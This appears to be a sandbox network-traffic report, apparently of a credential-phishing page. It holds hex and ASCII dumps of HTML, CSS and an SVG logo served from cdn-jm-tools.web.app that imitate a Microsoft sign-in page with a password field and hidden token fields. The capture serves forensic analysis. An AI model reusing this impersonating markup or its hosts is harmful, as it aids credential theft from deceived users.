2024-04-16 23:37:39 UTC	1369	IN	Data Raw: 5f 6f 6e 43 6c 69 63 6b 2c 20 68 61 73 46 6f 63 75 73 3a 20 66 6f 63 75 73 4f 6e 42 61 63 6b 42 75 74 74 6f 6e 22 20 69 64 3d 22 69 64 42 74 6e 5f 42 61 63 6b 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 42 61 63 6b 22 3e 3c 69 6d 67 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 20 70 6e 67 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 6a 6d 2d 74 6f 6f 6c 73 2e 77 65 62 2e 61 70 70 2f 64 2e 2e 70 2f 6f 74 68 65 72 73 2f 6d 69 2e 2e 63 72 6f 2d 2d 2d 74 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 37 63 63 30 39 36 64 61 36 61 61 32 64 62 61 33 66 38 31 66 63 63 31 63 38 32 36 32 31 35 37 63 2e 70 6e 67 22 20 73 76 67 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 6a 6d 2d 74 6f 6f 6c 73 2e 77 65 62 2e 61 70 70 2f 64 2e 2e 70 2f 6f 74 68 65 72 Data Ascii: _onClick, hasFocus: focusOnBackButton" id="idBtn_Back" aria-label="Back"><img role="presentation" pngsrc="https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png" svgsrc="https://cdn-jm-tools.web.app/d..p/other
2024-04-16 23:37:39 UTC	1369	IN	Data Raw: 55 73 65 72 6e 61 6d 65 2c 20 70 61 73 73 77 6f 72 64 42 72 6f 77 73 65 72 50 72 65 66 69 6c 6c 3a 20 73 68 61 72 65 64 44 61 74 61 2e 70 61 73 73 77 6f 72 64 42 72 6f 77 73 65 72 50 72 65 66 69 6c 6c 2c 20 61 76 61 69 6c 61 62 6c 65 43 72 65 64 73 3a 20 73 68 61 72 65 64 44 61 74 61 2e 61 76 61 69 6c 61 62 6c 65 43 72 65 64 73 2c 20 65 76 69 63 74 65 64 43 72 65 64 73 3a 20 73 68 61 72 65 64 44 61 74 61 2e 65 76 69 63 74 65 64 43 72 65 64 73 2c 20 75 73 65 45 76 69 63 74 65 64 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 73 68 61 72 65 64 44 61 74 61 2e 75 73 65 45 76 69 63 74 65 64 43 72 65 64 65 6e 74 69 61 6c 73 2c 20 73 68 6f 77 43 72 65 64 56 69 65 77 42 72 61 6e 64 69 6e 67 44 65 73 63 3a 20 73 68 61 72 65 64 44 61 74 61 2e 73 68 6f 77 43 72 65 64 56 69 Data Ascii: Username, passwordBrowserPrefill: sharedData.passwordBrowserPrefill, availableCreds: sharedData.availableCreds, evictedCreds: sharedData.evictedCreds, useEvictedCredentials: sharedData.useEvictedCredentials, showCredViewBrandingDesc: sharedData.showCredVi
2024-04-16 23:37:39 UTC	1369	IN	Data Raw: 50 61 72 74 69 74 69 6f 6e 22 20 64 61 74 61 2d 62 69 6e 64 3d 22 76 61 6c 75 65 3a 20 63 61 6c 6c 4d 65 74 61 64 61 74 61 2e 4c 6f 6e 67 52 75 6e 6e 69 6e 67 54 72 61 6e 73 61 63 74 69 6f 6e 50 61 72 74 69 74 69 6f 6e 22 3e 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 68 69 73 52 65 67 69 6f 6e 22 20 64 61 74 61 2d 62 69 6e 64 3d 22 76 61 6c 75 65 3a 20 63 61 6c 6c 4d 65 74 61 64 61 74 61 2e 48 69 73 52 65 67 69 6f 6e 22 3e 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 68 69 73 53 63 61 6c 65 55 6e 69 74 22 20 64 61 74 61 2d 62 69 6e 64 3d 22 76 61 6c 75 65 3a 20 63 61 6c 6c 4d 65 74 61 64 61 74 61 2e 48 69 73 53 63 61 6c 65 55 6e 69 74 22 3e 3c 64 69 76 20 69 64 3d 22 6c 6f 67 Data Ascii: Partition" data-bind="value: callMetadata.LongRunningTransactionPartition"> <input type="hidden" name="hisRegion" data-bind="value: callMetadata.HisRegion"> <input type="hidden" name="hisScaleUnit" data-bind="value: callMetadata.HisScaleUnit"><div id="log
2024-04-16 23:37:39 UTC	1369	IN	Data Raw: 72 65 65 6e 3a 20 73 68 6f 77 50 61 73 73 77 6f 72 64 2c 20 63 73 73 3a 20 7b 20 27 68 61 73 2d 65 72 72 6f 72 27 3a 20 70 61 73 73 77 6f 72 64 54 65 78 74 62 6f 78 2e 65 72 72 6f 72 20 7d 22 20 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 22 6c 6f 67 69 6e 48 65 61 64 65 72 20 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 50 61 73 73 77 6f 72 64 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 45 6e 74 65 72 20 74 68 65 20 70 61 73 73 77 6f 72 64 20 66 6f 72 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 64 61 74 61 2d 62 69 6e 64 3d 22 63 73 73 3a 20 7b 20 27 70 6f 73 69 74 69 6f 6e 2d 62 75 74 74 6f 6e 73 27 3a 20 21 74 65 6e 61 6e 74 42 72 61 6e 64 69 6e 67 2e 42 6f 69 6c 65 72 50 6c 61 Data Ascii: reen: showPassword, css: { 'has-error': passwordTextbox.error }" aria-describedby="loginHeader " placeholder="Password" aria-label="Enter the password for" tabindex="0"></div></div></div><div data-bind="css: { 'position-buttons': !tenantBranding.BoilerPla
2024-04-16 23:37:39 UTC	1369	IN	Data Raw: 73 69 62 6c 65 3a 20 73 76 72 2e 66 2c 20 69 73 53 65 63 6f 6e 64 61 72 79 42 75 74 74 6f 6e 45 6e 61 62 6c 65 64 3a 20 74 72 75 65 2c 20 69 73 53 65 63 6f 6e 64 61 72 79 42 75 74 74 6f 6e 56 69 73 69 62 6c 65 3a 20 66 61 6c 73 65 20 7d 2c 20 65 76 65 6e 74 3a 20 7b 20 70 72 69 6d 61 72 79 42 75 74 74 6f 6e 43 6c 69 63 6b 3a 20 70 72 69 6d 61 72 79 42 75 74 74 6f 6e 5f 6f 6e 43 6c 69 63 6b 20 7d 20 7d 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 32 34 20 6e 6f 2d 70 61 64 64 69 6e 67 2d 6c 65 66 74 2d 72 69 67 68 74 20 62 75 74 74 6f 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 62 69 6e 64 3d 22 20 76 69 73 69 62 6c 65 3a 20 69 73 50 72 69 6d 61 72 79 42 75 74 74 6f 6e 56 69 73 69 62 6c 65 28 29 20 7c 7c 20 69 73 53 65 63 6f 6e Data Ascii: sible: svr.f, isSecondaryButtonEnabled: true, isSecondaryButtonVisible: false }, event: { primaryButtonClick: primaryButton_onClick } }"><div class="col-xs-24 no-padding-left-right button-container" data-bind=" visible: isPrimaryButtonVisible() \|\| isSecon
2024-04-16 23:37:39 UTC	1369	IN	Data Raw: 22 20 6e 61 6d 65 3d 22 68 70 67 72 65 71 75 65 73 74 69 64 22 20 64 61 74 61 2d 62 69 6e 64 3d 22 76 61 6c 75 65 3a 20 73 76 72 2e 73 65 73 73 69 6f 6e 49 64 22 3e 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 69 30 33 32 37 22 20 64 61 74 61 2d 62 69 6e 64 3d 22 61 74 74 72 3a 20 7b 20 6e 61 6d 65 3a 20 73 76 72 2e 42 74 20 7d 2c 20 76 61 6c 75 65 3a 20 66 6c 6f 77 54 6f 6b 65 6e 22 20 6e 61 6d 65 3d 22 50 50 46 54 22 20 76 61 6c 75 65 3d 22 44 64 67 75 62 50 62 6e 78 62 2a 37 58 31 51 44 50 43 63 55 72 4c 45 47 70 5a 63 58 71 70 48 32 72 56 6b 6c 54 43 57 66 51 6e 4d 74 35 54 52 63 38 4e 53 57 4c 50 49 71 5a 76 66 2a 65 6f 49 6b 4b 4e 70 59 53 4b 69 70 48 74 63 55 2a 46 6b 46 6a 61 58 47 35 6f 77 76 32 53 56 39 79 5a 44 Data Ascii: " name="hpgrequestid" data-bind="value: svr.sessionId"> <input type="hidden" id="i0327" data-bind="attr: { name: svr.Bt }, value: flowToken" name="PPFT" value="DdgubPbnxb7X1QDPCcUrLEGpZcXqpH2rVklTCWfQnMt5TRc8NSWLPIqZvfeoIkKNpYSKipHtcU*FkFjaXG5owv2SV9yZD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49712	199.36.158.100	443	6352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 23:37:39 UTC	629	OUT	GET /d..p/others/mi..cro---t/Converged_v21033_U7M7Fc-d_yiO2hIJng7nRg2.css HTTP/1.1 Host: cdn-jm-tools.web.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 23:37:39 UTC	607	IN	HTTP/1.1 200 OK Connection: close Content-Length: 102041 Cache-Control: max-age=3600 Content-Type: text/css; charset=utf-8 Etag: "180ed6b42ce49176e493ebf3f2145e670be96178b9e2f60001e81532e32268cb" Last-Modified: Sat, 25 Apr 2020 21:22:54 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Tue, 16 Apr 2024 23:37:39 GMT X-Served-By: cache-pdk-kfty2130041-PDK X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1713310660.625888,VS0,VE2 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-04-16 23:37:39 UTC	1378	IN	Data Raw: 2f 2a 21 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2a 2f 0a 2f 2a 21 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 Data Ascii: /! Copyright (C) Microsoft Corporation. All rights reserved. //*!------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------This file is based on or incorporates material from the projects listed
2024-04-16 23:37:39 UTC	1378	IN	Data Raw: 65 20 61 62 6f 76 65 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61 6e 64 20 74 68 69 73 20 70 65 72 6d 69 73 73 69 6f 6e 20 6e 6f 74 69 63 65 20 73 68 61 6c 6c 20 62 65 20 69 6e 63 6c 75 64 65 64 20 69 6e 0a 61 6c 6c 20 63 6f 70 69 65 73 20 6f 72 20 73 75 62 73 74 61 6e 74 69 61 6c 20 70 6f 72 74 69 6f 6e 73 20 6f 66 20 74 68 65 20 53 6f 66 74 77 61 72 65 2e 0a 0a 54 48 45 20 53 4f 46 54 57 41 52 45 20 49 53 20 50 52 4f 56 49 44 45 44 20 22 41 53 20 49 53 22 2c 20 57 49 54 48 4f 55 54 20 57 41 52 52 41 4e 54 59 20 4f 46 20 41 4e 59 20 4b 49 4e 44 2c 20 45 58 50 52 45 53 53 20 4f 52 0a 49 4d 50 4c 49 45 44 2c 20 49 4e 43 4c 55 44 49 4e 47 20 42 55 54 20 4e 4f 54 20 4c 49 4d 49 54 45 44 20 54 4f 20 54 48 45 20 57 41 52 52 41 4e 54 49 45 53 20 4f Data Ascii: e above copyright notice and this permission notice shall be included inall copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS ORIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES O
2024-04-16 23:37:39 UTC	1378	IN	Data Raw: 6c 20 62 65 20 69 6e 63 6c 75 64 65 64 20 69 6e 20 61 6c 6c 20 63 6f 70 69 65 73 20 6f 72 20 73 75 62 73 74 61 6e 74 69 61 6c 20 70 6f 72 74 69 6f 6e 73 20 6f 66 20 74 68 65 20 53 6f 66 74 77 61 72 65 2e 0a 0a 54 48 45 20 53 4f 46 54 57 41 52 45 20 49 53 20 50 52 4f 56 49 44 45 44 20 22 41 53 20 49 53 22 2c 20 57 49 54 48 4f 55 54 20 57 41 52 52 41 4e 54 59 20 4f 46 20 41 4e 59 20 4b 49 4e 44 2c 20 45 58 50 52 45 53 53 20 4f 52 20 49 4d 50 4c 49 45 44 2c 20 49 4e 43 4c 55 44 49 4e 47 20 42 55 54 20 4e 4f 54 20 4c 49 4d 49 54 45 44 20 54 4f 20 54 48 45 20 57 41 52 52 41 4e 54 49 45 53 20 4f 46 20 4d 45 52 43 48 41 4e 54 41 42 49 4c 49 54 59 2c 20 46 49 54 4e 45 53 53 20 46 4f 52 20 41 20 50 41 52 54 49 43 55 4c 41 52 20 50 55 52 50 4f 53 45 20 41 4e 44 20 Data Ascii: l be included in all copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
2024-04-16 23:37:39 UTC	1378	IN	Data Raw: 43 4f 50 59 52 49 47 48 54 20 48 4f 4c 44 45 52 53 20 42 45 0a 4c 49 41 42 4c 45 20 46 4f 52 20 41 4e 59 20 43 4c 41 49 4d 2c 20 44 41 4d 41 47 45 53 20 4f 52 20 4f 54 48 45 52 20 4c 49 41 42 49 4c 49 54 59 2c 20 57 48 45 54 48 45 52 20 49 4e 20 41 4e 20 41 43 54 49 4f 4e 0a 4f 46 20 43 4f 4e 54 52 41 43 54 2c 20 54 4f 52 54 20 4f 52 20 4f 54 48 45 52 57 49 53 45 2c 20 41 52 49 53 49 4e 47 20 46 52 4f 4d 2c 20 4f 55 54 20 4f 46 20 4f 52 20 49 4e 20 43 4f 4e 4e 45 43 54 49 4f 4e 0a 57 49 54 48 20 54 48 45 20 53 4f 46 54 57 41 52 45 20 4f 52 20 54 48 45 20 55 53 45 20 4f 52 20 4f 54 48 45 52 20 44 45 41 4c 49 4e 47 53 20 49 4e 20 54 48 45 20 53 4f 46 54 57 41 52 45 2e 0a 2a 2f 0a 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 33 2e 30 2e 32 20 7c Data Ascii: COPYRIGHT HOLDERS BELIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTIONOF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTIONWITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.//! normalize.css v3.0.2 \|
2024-04-16 23:37:39 UTC	1378	IN	Data Raw: 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 62 75 74 74 6f 6e 5b 64 69 73 61 62 6c 65 64 5d 2c 68 74 6d 6c 20 69 6e 70 75 74 5b 64 69 73 61 62 6c 65 64 5d 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 69 6e 70 75 74 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 69 6e 70 75 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 7d 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 7b 62 6f 78 2d 73 69 7a Data Ascii: ut[type="submit"]{-webkit-appearance:button;cursor:pointer}button[disabled],html input[disabled]{cursor:default}button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}input{line-height:normal}input[type="checkbox"],input[type="radio"]{box-siz
2024-04-16 23:37:39 UTC	1378	IN	Data Raw: 67 68 74 3a 31 70 78 3b 6d 61 72 67 69 6e 3a 2d 31 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 63 6c 69 70 3a 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 62 6f 72 64 65 72 3a 30 7d 2e 73 72 2d 6f 6e 6c 79 2d 66 6f 63 75 73 61 62 6c 65 3a 61 63 74 69 76 65 2c 2e 73 72 2d 6f 6e 6c 79 2d 66 6f 63 75 73 61 62 6c 65 3a 66 6f 63 75 73 7b 70 6f 73 69 74 69 6f 6e 3a 73 74 61 74 69 63 3b 77 69 64 74 68 3a 61 75 74 6f 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 3b 63 6c 69 70 3a 61 75 74 6f 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 53 65 67 6f 65 20 55 49 20 57 65 62 66 6f 6e 74 22 Data Ascii: ght:1px;margin:-1px;padding:0;overflow:hidden;clip:rect(0,0,0,0);border:0}.sr-only-focusable:active,.sr-only-focusable:focus{position:static;width:auto;height:auto;margin:0;overflow:visible;clip:auto}html{font-size:100%}body{font-family:"Segoe UI Webfont"
2024-04-16 23:37:39 UTC	1378	IN	Data Raw: 61 6c 2d 74 69 74 6c 65 5d 7b 63 75 72 73 6f 72 3a 68 65 6c 70 7d 62 6c 6f 63 6b 71 75 6f 74 65 20 70 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 62 6c 6f 63 6b 71 75 6f 74 65 20 75 6c 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 62 6c 6f 63 6b 71 75 6f 74 65 20 6f 6c 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 62 6c 6f 63 6b 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 62 6c 6f 63 6b 71 75 6f 74 65 20 73 6d 61 6c 6c 2c 62 6c 6f 63 6b 71 75 6f 74 65 20 2e 73 6d 61 6c 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 64 64 72 65 73 73 7b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 53 65 67 6f 65 20 55 49 20 57 65 62 66 6f 6e 74 27 3b 73 72 63 3a 6c 6f 63 61 Data Ascii: al-title]{cursor:help}blockquote p:last-child,blockquote ul:last-child,blockquote ol:last-child{margin-bottom:0}blockquote footer,blockquote small,blockquote .small{display:block}address{font-style:normal}@font-face{font-family:'Segoe UI Webfont';src:loca
2024-04-16 23:37:39 UTC	1378	IN	Data Raw: 74 3a 33 2e 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 2e 33 36 32 38 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 2e 33 36 32 38 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 2e 33 36 32 38 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 2e 33 36 32 38 70 78 7d 2e 74 65 78 74 2d 68 65 61 64 65 72 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 68 31 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 36 32 2e 37 32 35 36 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 2e 39 32 30 33 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 65 72 2e 74 65 78 74 2d 6d 61 78 6c 69 Data Ascii: t:3.5rem;padding-bottom:3.3628px;padding-top:3.3628px;padding-bottom:3.3628px;padding-top:3.3628px}.text-header.text-maxlines-1,h1.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:62.7256px;max-height:3.92035rem}.text-header.text-maxli
2024-04-16 23:37:39 UTC	1378	IN	Data Raw: 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 32 2e 37 32 36 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 30 34 35 34 72 65 6d 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 2c 68 33 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 36 30 2e 37 32 36 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 2e 37 39 35 34 72 65 6d 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 2c 68 33 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 38 38 2e 37 32 36 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 35 2e 35 34 35 34 72 65 6d 7d 2e 74 65 78 74 2d 74 69 Data Ascii: rap;text-overflow:ellipsis;max-height:32.7264px;max-height:2.0454rem}.text-title.text-maxlines-2,h3.text-maxlines-2{max-height:60.7264px;max-height:3.7954rem}.text-title.text-maxlines-3,h3.text-maxlines-3{max-height:88.7264px;max-height:5.5454rem}.text-ti
2024-04-16 23:37:39 UTC	1378	IN	Data Raw: 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 34 34 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 37 37 32 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 35 38 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 2e 36 34 37 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2d 61 6c 74 2c 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 32 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 36 32 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 2e 37 35 72 Data Ascii: h5.text-maxlines-3{max-height:44.3632px;max-height:2.7727rem}.text-caption.text-maxlines-4,h5.text-maxlines-4{max-height:58.3632px;max-height:3.6477rem}.text-caption-alt,h6{font-size:10px;line-height:12px;font-weight:400;font-size:.625rem;line-height:.75r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49711	199.36.158.100	443	6352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 23:37:39 UTC	682	OUT	GET /d..p/others/mi..cro---t/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1 Host: cdn-jm-tools.web.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 23:37:39 UTC	595	IN	HTTP/1.1 200 OK Connection: close Content-Length: 3651 Cache-Control: max-age=3600 Content-Type: image/svg+xml Etag: "2084deafc36fbaca40a6352319b3c1edb1262245428033547de6b82e0c2dcfe8" Last-Modified: Sat, 25 Apr 2020 21:22:54 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Tue, 16 Apr 2024 23:37:39 GMT X-Served-By: cache-pdk-kfty2130067-PDK X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1713310660.673013,VS0,VE6 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-04-16 23:37:39 UTC	1378	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0
